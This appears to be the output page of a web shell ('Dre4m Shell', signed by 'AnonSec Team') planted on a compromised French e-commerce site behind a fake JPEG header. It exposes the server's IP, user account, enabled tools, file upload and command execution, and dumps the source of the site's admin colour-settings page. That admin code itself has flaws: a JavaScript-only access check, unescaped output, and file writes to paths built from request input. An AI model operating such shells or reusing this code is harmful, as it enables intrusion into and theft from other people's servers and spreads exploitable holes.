ÿØÿàJFIF``ÿþxØ Dre4m Was Here
Dre4m Shell
Server IP : 109.234.164.53  /  Your IP : 216.73.216.110
Web Server : Apache
System : Linux cervelle.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64
User : computer3 ( 1098)
PHP Version : 7.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/computer3/tonnelles-sud-ouest.fr/cp-admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/computer3/tonnelles-sud-ouest.fr/cp-admin/tema.php
<?php
include_once('includes/header.php');

if($niveauT <> 1) { 
  echo '<script>';
  echo 'window.location = "./index.php"';
  echo '</script>';
}

$sql = $bdd->query('SELECT * FROM info
  WHERE id = 1');

  $list = $sql->fetchAll();
  
  for($i=0; $i<count($list); $i++) {
        $t1 = $list[$i]['t1'];
        $t2 = $list[$i]['t2'];
        $t3 = $list[$i]['t3'];
        $t4 = $list[$i]['t4'];
        $t5 = $list[$i]['t5'];
        $t6 = $list[$i]['t6'];
        $t7 = $list[$i]['t7'];
       
        $box = $list[$i]['box'];
        $box_bor = $list[$i]['box_bor'];
        $box_txt = $list[$i]['box_txt'];
        $box_hyp = $list[$i]['box_hyp'];
        $box_hov = $list[$i]['box_hov'];
       
        $fil = $list[$i]['fil'];
        $filS = $list[$i]['filS'];
        $textfoot = $list[$i]['textfoot'];
        $hypfoot = $list[$i]['hypfoot'];
        $hovfoot = $list[$i]['hovfoot'];
        $h4foot = $list[$i]['h4foot'];
        $h5foot = $list[$i]['h5foot'];
 
        $tfil = $list[$i]['tfil'];
        $tfilS = $list[$i]['tfilS'];
        $fmenu = $list[$i]['fmenu'];
        $menu_large_fond= $list[$i]['menu_large_fond'];

        $hymenu = $list[$i]['hymenu'];
        $homenu = $list[$i]['homenu'];
        $hyssmenu= $list[$i]['hyssmenu'];
        $hossmenu = $list[$i]['hossmenu'];

        $top= $list[$i]['top'];
        $top_hyp= $list[$i]['top_hyp'];
        $top_hyp_hov= $list[$i]['top_hyp_hov'];


        $bottom= $list[$i]['bottom'];
        $bottom_hyp= $list[$i]['bottom_hyp'];
        $bottom_hyp_hov= $list[$i]['bottom_hyp_hov'];
        
        
       $thum= $list[$i]['thum'];
       $thumbord= $list[$i]['thumbord'];
       $caption= $list[$i]['caption'];
       $prix = $list[$i]['prix'];
 
       $global_hyp= $list[$i]['global_hyp'];
       $global_txt= $list[$i]['global_txt'];
       $global_hov= $list[$i]['global_hov'];      
       
       $foot_coul= $list[$i]['foot_coul'];
       
       $start_hyp= $list[$i]['start_hyp'];
       $start_hov= $list[$i]['start_hov'];      
      
       
}


/*
if(isset($_POST['secure'])) 
{
  $username = $_POST['username'];
  $password = $_POST['password'];

  $htaccess = '# Solve 401 rewrite and auth conflict on some machines' . PHP_EOL
            .  'ErrorDocument 401 "Access Forbidden"' . PHP_EOL
            . PHP_EOL
            . '# Denied content' . PHP_EOL
            . '<FilesMatch "\.(htaccess|htpasswd|inc.php)$">' . PHP_EOL
            . '  Order Allow,Deny' . PHP_EOL
            . '  Deny from all' . PHP_EOL
            . '</FilesMatch>' . PHP_EOL
            . PHP_EOL
            . '# Basic authentication' . PHP_EOL
            . '<IfModule mod_auth_basic.c>' . PHP_EOL
            . '  AuthType Basic' . PHP_EOL
            . '  AuthName "Restricted Area"' . PHP_EOL
            . '  AuthUserFile "' . realpath("") . '/.htpasswd"' . PHP_EOL
            . '  Require valid-user' . PHP_EOL
            . '</IfModule>' . PHP_EOL;
  
  if (is_dir('../'.$_REQUEST['admin_folder'])) {
    file_put_contents(''. $_REQUEST['admin_folder'] .'.htaccess', $htaccess);
  }

  if (is_dir('../'.$_REQUEST['admin_folder'])) {
    $htpasswd = $username .':{SHA}'. base64_encode(sha1($password, true)) . PHP_EOL;
    if (file_put_contents('.htpasswd', $htpasswd)) {
    }
  }
}
*/



if(isset($_POST['edit'])) {
  $sql = $bdd->prepare('UPDATE info SET t1=:t1, t2=:t2, t3=:t3, t4=:t4, t5=:t5, t6=:t6, t7=:t7, box=:box, fil=:fil, filS=:filS, textfoot=:textfoot, hypfoot=:hypfoot, hovfoot=:hovfoot, 
  h5foot=:h5foot, h4foot=:h4foot, tfil=:tfil, tfilS=:tfilS, fmenu=:fmenu, menu_large_fond=:menu_large_fond, hymenu=:hymenu, homenu=:homenu, hyssmenu=:hyssmenu, hossmenu=:hossmenu, top=:top, top_hyp=:top_hyp, top_hyp_hov=:top_hyp_hov,
  box_bor=:box_bor, box_txt=:box_txt, box_hyp=:box_hyp, box_hov=:box_hov, thum=:thum, thumbord=:thumbord, caption=:caption, prix=:prix,bottom=:bottom, bottom_hyp=:bottom_hyp, bottom_hyp_hov=:bottom_hyp_hov, 
  global_txt=:global_txt, global_hyp=:global_hyp, global_hov=:global_hov, foot_coul=:foot_coul, start_hyp=:start_hyp, start_hov=:start_hov

  WHERE id = 1');
  $sql->execute(array(
 
       'start_hov' => $_POST['start_hov'],
       'start_hyp' => $_POST['start_hyp'],
       'foot_coul' => $_POST['foot_coul'],
       'global_txt' => $_POST['global_txt'],
       'global_hov' => $_POST['global_hov'],
       'global_hyp' => $_POST['global_hyp'],

      't1' => $_POST['t1'],
       't2' => $_POST['t2'],
       't3' => $_POST['t3'],
       't4' => $_POST['t4'],
       't5' => $_POST['t5'],
       't6' => $_POST['t6'],
       't7' => $_POST['t7'],

       'box' => $_POST['box'],
       'box_bor' => $_POST['box_bor'],
       'box_txt' => $_POST['box_txt'],
       'box_hyp' => $_POST['box_hyp'],
       'box_hov' => $_POST['box_hov'],
       
       'fil' => $_POST['fil'],
       'filS' => $_POST['filS'],
       'textfoot' => $_POST['textfoot'],
       'hypfoot' => $_POST['hypfoot'],
       'hovfoot' => $_POST['hovfoot'],
       'h5foot' => $_POST['h5foot'],
       'h4foot' => $_POST['h4foot'],
       
       'tfil' => $_POST['tfil'],
       'tfilS' => $_POST['tfilS'],
       'fmenu' => $_POST['fmenu'],
       'menu_large_fond' => $_POST['menu_large_fond'],

       'hymenu' => $_POST['hymenu'],
       'homenu' => $_POST['homenu'],
       'hyssmenu' => $_POST['hyssmenu'],
       'hossmenu' => $_POST['hossmenu'],
      
        'top' => $_POST['top'],
        'top_hyp' => $_POST['top_hyp'],
        'top_hyp_hov' => $_POST['top_hyp_hov'],
      
         'bottom' => $_POST['bottom'],
        'bottom_hyp' => $_POST['bottom_hyp'],
        'bottom_hyp_hov' => $_POST['bottom_hyp_hov'],


       'thumbord' => $_POST['thumbord'],
        'thum' => $_POST['thum'],
       'caption' => $_POST['caption'],
       'prix' => $_POST['prix']
      
      
   ));

  echo '<script>';
  echo 'window.location = "./tema.php"';
  echo '</script>';
}

?>

<div class="container">
    <div class="row">
      <div class="span12">
          <div class="page-header">
              <h1>Paramètres Généraux</h1>
            </div>
        </div>
    </div>
    <div class="row">
    <div class="span3">
        <ul class="nav nav-tabs nav-stacked">
              <li class="active"><a href="./tema.php">Th&egrave;mes couleurs</a></li>
              <li><a href="settings.php">Général</a></li>
              <li><a href="./log/register.php">Utilisateurs CP-ADMIN</a>
              <li><a href="./tema_elements.php">Th&egrave;mes &eacute;l&eacute;ments</a>
              <li><a href="set_configuration.php">Configuration</a>
              <li><a href="medias.php">Explorateur de fichiers</a>

           </ul>
        </div>
        <div class="span9 settings">
          <form action="#" method="post" class="form-horizontal" enctype="multipart/form-data">
            <div class="well general" style="margin-top:0;background : #F5F5F5">

<b>D'autres couleurs sont dans 'Th&egrave;mes &eacute;l&eacute;ments'.
</b>
<br />
<br />

     <h3 style="color: #fff; line-height: 25px; padding-bottom: 8px; padding-left: 30px">1-&nbsp;&nbsp;Couleurs fond Top haut du site et fond formulaire newsletter</h3><br /><br />

              <div class="control-group">
                <label class="control-label" style="width:320px;" for="top">Couleur Fond TOP :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="top" style="width:65px;" value="<?php echo ''.$top.''; ?>">                
                  </div>
              </div>


              <div class="control-group">
                <label class="control-label" style="width:320px;" for="top_hyp">Couleur HyperText TOP :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="top_hyp" style="width:65px;" value="<?php echo ''.$top_hyp.''; ?>">                
                  </div>
              </div>


              <div class="control-group">
                <label class="control-label" style="width:320px;" for="top_hyp_hov">Couleur HoverText TOP :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="top_hyp_hov" style="width:65px;" value="<?php echo ''.$top_hyp_hov.''; ?>">                
                  </div>
              </div>



<br /><br /><h3 style="color: #fff; line-height: 25px; padding-bottom: 8px; padding-left: 30px">2-&nbsp;&nbsp;Couleurs menu principal</h3><br /><br />


              <div class="control-group">
                <label class="control-label" style="width:320px;" for="filS">Couleur HyperText MENU :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="hymenu" style="width:65px;" value="<?php echo ''.$hymenu.''; ?>">                
                  </div>
              </div>


              <div class="control-group">
                <label class="control-label" style="width:320px;" for="box">Couleur HoverText MENU :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="homenu" style="width:65px;" value="<?php echo ''.$homenu.''; ?>">                
                  </div>
              </div>

<br />

              <div class="control-group">
                <label class="control-label" style="width:320px;" for="fil">Couleur Fond MENU :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="fmenu" style="width:65px;" value="<?php echo ''.$fmenu.''; ?>">                
                  </div>
              </div>



              <div class="control-group">
                <label class="control-label" style="width:320px;" for="fil">Couleur menu large FOND :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="menu_large_fond" style="width:65px;" value="<?php echo ''.$menu_large_fond.''; ?>">                
                  </div>
              </div>


              <div class="control-group">
                <label class="control-label" style="width:320px;" for="hyssmenu">Couleur HyperText SOUS MENU :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="hyssmenu" style="width:65px;" value="<?php echo ''.$hyssmenu.''; ?>">                
                  </div>
              </div>


              <div class="control-group">
                <label class="control-label" style="width:320px;" for="box">Couleur HoverText SOUS MENU :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="hossmenu" style="width:65px;" value="<?php echo ''.$hossmenu.''; ?>">                
                  </div>
              </div>





<br /><br /><h3 style="color: #fff; line-height: 25px; padding-bottom: 8px; padding-left: 30px">3-&nbsp;&nbsp;Couleurs Titres</h3><br /><br />


              <div class="control-group">
                <label class="control-label" style="width:320px;" for="filS">Couleur Fond Titre Site :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="filS" style="width:65px;" value="<?php echo ''.$filS.''; ?>">                
                  </div>
              </div>

              <div class="control-group">
                <label class="control-label" style="width:320px;" for="filS">Couleur Texte Titre Site :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="tfilS" style="width:65px;" value="<?php echo ''.$tfilS.''; ?>">                
                  </div>
              </div>
              
              
<br />
<br />
              <div class="control-group">
                <label class="control-label" style="width:320px;" for="fil">Couleur de Fond Titre Email :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="fil" style="width:65px;" value="<?php echo ''.$fil.''; ?>">                
                  </div>
              </div>

              <div class="control-group">
                <label class="control-label" style="width:320px;" for="filS">Couleur Texte Titre Email :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="tfil" style="width:65;height:22" value="<?php echo ''.$tfil.''; ?>">                
                  </div>
              </div>



<br /><br /><h3 style="color: #fff; line-height: 25px; padding-bottom: 8px; padding-left: 30px">4-&nbsp;&nbsp;Couleurs Box (colonne)</h3><br /><br />

              <div class="control-group">
                <label class="control-label" style="width:320px;" for="box">Couleur Box Site :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="box" style="width:65px;" value="<?php echo ''.$box.''; ?>">                
                  </div>
              </div>
              
 
              <div class="control-group">
                <label class="control-label" style="width:320px;" for="box_bor">Couleur Box Bordure :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="box_bor" style="width:65px;" value="<?php echo ''.$box_bor.''; ?>">                
                  </div>
              </div>


              <div class="control-group">
                <label class="control-label" style="width:320px;" for="box_txt">Couleur Box Texte :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="box_txt" style="width:65px;" value="<?php echo ''.$box_txt.''; ?>">                
                  </div>
              </div>

              <div class="control-group">
                <label class="control-label" style="width:320px;" for="box_hyp">Couleur Box HyperT :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="box_hyp" style="width:65px;" value="<?php echo ''.$box_hyp.''; ?>">                
                  </div>
              </div>

              <div class="control-group">
                <label class="control-label" style="width:320px;" for="box_hov">Couleur Box Hover :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="box_hov" style="width:65px;" value="<?php echo ''.$box_hov.''; ?>">                
                  </div>
              </div>
              
              

<br /><br /><h3 style="color: #fff; line-height: 25px; padding-bottom: 8px; padding-left: 30px">5-&nbsp;&nbsp;Couleurs Produits</h3><br /><br />
 
              <div class="control-group">
                <label class="control-label" style="width:320px;" for="thum">Couleur fond produits :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="thum" style="width:65px;" value="<?php echo ''.$thum.''; ?>">                 
                  </div>
              </div>

              <div class="control-group">
                <label class="control-label" style="width:320px;" for="thumbord">Couleur bordure produits :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="thumbord" style="width:65px;" value="<?php echo ''.$thumbord.''; ?>">                 
                  </div>
              </div>


              <div class="control-group">
                <label class="control-label" style="width:320px;" for="caption">Couleur Texte produits :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="caption" style="width:65px;" value="<?php echo ''.$caption.''; ?>">                
                  </div>
              </div>


              <div class="control-group">
                <label class="control-label" style="width:320px;" for="prix">Couleur Prix :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="prix" style="width:65px;" value="<?php echo ''.$prix.''; ?>">                


<br /><br />
Pour modifier les images des boutons produits et autres (panier, etc.) ouvrez l'explorateur de fichiers (templates/shop/img) et respectez le nom et le format de l'image &agrave; modifier.
<br />
<br />


                  </div>
              </div>




<br /><br /><h3 style="color: #fff; line-height: 25px; padding-bottom: 8px; padding-left: 30px">
6-&nbsp;&nbsp;Couleurs Bottom</h3><br /><br />

              <div class="control-group">
                <label class="control-label" style="width:320px;" for="bottom">Couleur Fond BOTTOM :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="bottom" style="width:65px;" value="<?php echo ''.$bottom.''; ?>">                
                  </div>
              </div>


              <div class="control-group">
                <label class="control-label" style="width:320px;" for="bottom_hyp">Couleur HyperText BOTTOM :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="bottom_hyp" style="width:65px;" value="<?php echo ''.$bottom_hyp.''; ?>">                
                  </div>
              </div>


              <div class="control-group">
                <label class="control-label" style="width:320px;" for="bottom_hyp_hov">Couleur HoverText BOTTOM :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="bottom_hyp_hov" style="width:65px;" value="<?php echo ''.$bottom_hyp_hov.''; ?>">                
                  </div>
              </div>



<br /><br /><h3 style="color: #fff; line-height: 25px; padding-bottom: 8px; padding-left: 30px">
7-&nbsp;&nbsp;Couleurs Footer</h3><br /><br />

             
              <div class="control-group">
                <label class="control-label" style="width:320px;" for="foot_coul">Couleur de fond footer :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="foot_coul" style="width:65px;" value="<?php echo ''.$foot_coul.''; ?>">                 
                  <br />Si pas image (image <i>nom_du_theme_footer.png</i> dans explorateur de fichiers template/shop/img)
                 </div>
              </div>


              <div class="control-group">
                <label class="control-label" style="width:320px;" for="h5foot">Couleur Texte Bandeau H5 footer :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="h5foot" style="width:65px;" value="<?php echo ''.$h5foot.''; ?>">                 
                  </div>
              </div>


              <div class="control-group">
                <label class="control-label" style="width:320px;" for="textfoot">Couleur Texte Footer :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="textfoot" style="width:65px;" value="<?php echo ''.$textfoot.''; ?>">                
                  </div>
              </div>


              <div class="control-group">
                <label class="control-label" style="width:320px;" for="hypfoot">Couleur Lien HyperT Footer :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="hypfoot" style="width:65px;" value="<?php echo ''.$hypfoot.''; ?>">                
                  </div>
              </div>

              <div class="control-group">
                <label class="control-label" style="width:320px;" for="hovfoot">Couleur Lien HoverT Footer :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="hovfoot" style="width:65px;" value="<?php echo ''.$hovfoot.''; ?>">                
                  </div>
              </div>


              <div class="control-group">
                <label class="control-label" style="width:320px;" for="h4foot">Couleur R.Sociaux H4 Footer :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="h4foot" style="width:65px;" value="<?php echo ''.$h4foot.''; ?>">          
                  </div>
              </div>



<br /><br /><h3 style="color: #fff; line-height: 25px; padding-bottom: 8px; padding-left: 30px">
8-&nbsp;&nbsp;Couleurs Globales du bouton Start To Top</h3><br /><br />

              <div class="control-group">
                <label class="control-label" style="width:320px;" for="box_hyp">Couleur Hypertexte :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="start_hyp" style="width:65px;" value="<?php echo ''.$start_hyp.''; ?>">                
                  </div>
              </div>

              <div class="control-group">
                <label class="control-label" style="width:320px;" for="box_hov">Couleur Hover :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="start_hov" style="width:65px;" value="<?php echo ''.$start_hov.''; ?>">                

                <br /><br />Pour changer la forme du bouton, Editez et modifiez le fichier : <br />templates/shop/css/global_end.css &agrave; la class : <b>.cd-top</b>
                  </div>
              </div>





<br /><br /><h3 style="color: #fff; line-height: 25px; padding-bottom: 8px; padding-left: 30px">
9-&nbsp;&nbsp;Couleurs Globales du site</h3><br /><br />

              <div class="control-group">
                <label class="control-label" style="width:320px;" for="box_txt">Couleur Texte :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="global_txt" style="width:65px;" value="<?php echo ''.$global_txt.''; ?>">                
                  </div>
              </div>

              <div class="control-group">
                <label class="control-label" style="width:320px;" for="box_hyp">Couleur Hypertexte :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="global_hyp" style="width:65px;" value="<?php echo ''.$global_hyp.''; ?>">                
                  </div>
              </div>

              <div class="control-group">
                <label class="control-label" style="width:320px;" for="box_hov">Couleur Hover :&nbsp;</label>                
                <div class="controls">
                  <input type="text" class="jscolor" name="global_hov" style="width:65px;" value="<?php echo ''.$global_hov.''; ?>">                
                  </div>
              </div>




<br /><br /><h3 style="color: #fff; line-height: 25px; padding-bottom: 8px; padding-left: 30px">&nbsp;&nbsp;Comment faire un nouveau th&egrave;me</h3><br /><br />

<div style="font-size: 28px;color: #F60;">Mes Th&egrave;mes</div>
<div style="font-size: 16px;color: #0070A6;"> 
<br />
Si je fais un nouveau th&egrave;me que j'appelle (ATTENTION : PAS DE MAJUSCULES 
!)&nbsp; : <b>vacances</b> 
<div style="color: #F60;">
je dois importer dans mon dossier : templates/shop/img&nbsp;&nbsp;&nbsp; 3 images via l'explorateur de fichiers.
</div>
<div style="color: #0070A6;">
1- <b>vacances_header.png</b>
<br />
2- <b>vacances_background.jpg</b>
<br />
3- <b>vacances_footer.png</b>
<br />
<br />
</div>
</div>

                         <div class="control-group">
              <label class="control-label" for="titlefrom">Th&egrave;me 1 :</label>
              <div class="controls">
                  <input type="text" id="t1" name="t1" style="width:100%" value="<?php echo ''.$t1.''; ?>">
              </div>
            </div>


                         <div class="control-group">
              <label class="control-label" for="titlefrom">Th&egrave;me 2 :</label>
              <div class="controls">
                  <input type="text" id="t2" name="t2" style="width:100%" value="<?php echo ''.$t2.''; ?>">
              </div>
            </div>


                         <div class="control-group">
              <label class="control-label" for="titlefrom">Th&egrave;me 3 :</label>
              <div class="controls">
                  <input type="text" id="t3" name="t3" style="width:100%" value="<?php echo ''.$t3.''; ?>">
              </div>
            </div>


                         <div class="control-group">
              <label class="control-label" for="titlefrom">Th&egrave;me 4 :</label>
              <div class="controls">
                  <input type="text" id="t4" name="t4" style="width:100%" value="<?php echo ''.$t4.''; ?>">
              </div>
            </div>


                         <div class="control-group">
              <label class="control-label" for="titlefrom">Th&egrave;me 5 :</label>
              <div class="controls">
                  <input type="text" id="t5" name="t5" style="width:100%" value="<?php echo ''.$t5.''; ?>">
              </div>
            </div>



                         <div class="control-group">
              <label class="control-label" for="titlefrom">Th&egrave;me 6 :</label>
              <div class="controls">
                  <input type="text" id="t6" name="t6" style="width:100%" value="<?php echo ''.$t6.''; ?>">
              </div>
            </div>



                         <div class="control-group">
              <label class="control-label" for="titlefrom">Th&egrave;me 7 :</label>
              <div class="controls">
                  <input type="text" id="t7" name="t7" style="width:100%" value="<?php echo ''.$t7.''; ?>">
              </div>
            </div>

           
            </div>
            <div class="form-actions">
             <button type="submit" name="edit" class="btn btn-primary ">Enregistrer</button>
            </div>
          </form>
        </div>
</div>

<div class="modal hide fade" id="slideshow_title_box" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true" wi>
  <div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">x</button>
    <h1>Protection Back-Office</h1>
  </div>
  <form action="settings.php" method="post" class="form-horizontal" enctype="multipart/form-data">
    <div class="modal-body">
        <label>Utilisateur :</label> <input type="text" name="username" style="width:100%" value="">
        <label>Mot de passe :</label> <input type="password" name="password" style="width:100%" value="">
    </div>
    <div class="modal-footer">
      <button class="btn" data-dismiss="modal" aria-hidden="true">Fermer</button>
      <button type="submit" name="secure" class="btn btn-primary ">Enregistrer</button>
    </div>
  </form>
</div>

<?
include_once('includes/footer.php');
?>

Anon7 - 2022
AnonSec Team